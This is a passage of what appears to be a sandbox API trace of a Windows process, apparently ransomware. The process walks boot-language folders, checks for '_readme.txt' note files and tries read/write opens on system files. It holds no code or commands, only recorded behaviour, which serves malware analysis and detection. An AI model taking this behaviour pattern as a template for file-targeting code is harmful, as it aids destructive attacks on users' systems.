hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.047] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0097.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.047] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.047] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.047] PathFindFileNameW (pszPath="") returned="" [0097.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.047] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.048] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.048] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0097.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.049] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b78ec8 [0097.049] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0097.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.049] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0097.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.050] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.050] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.050] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.050] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0097.050] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.050] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17e6c20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.051] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned=".txt" [0097.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.051] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17e6c20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.051] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.051] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.051] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.055] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0097.055] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.055] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.055] PathFindFileNameW (pszPath="") returned="" [0097.055] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.056] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.056] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.056] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b79750 [0097.057] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0097.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.057] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0097.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.057] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.057] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.058] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.058] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0097.058] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.058] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17e6c20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.058] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned=".txt" [0097.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.058] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17e6c20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.059] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.059] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.059] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.059] 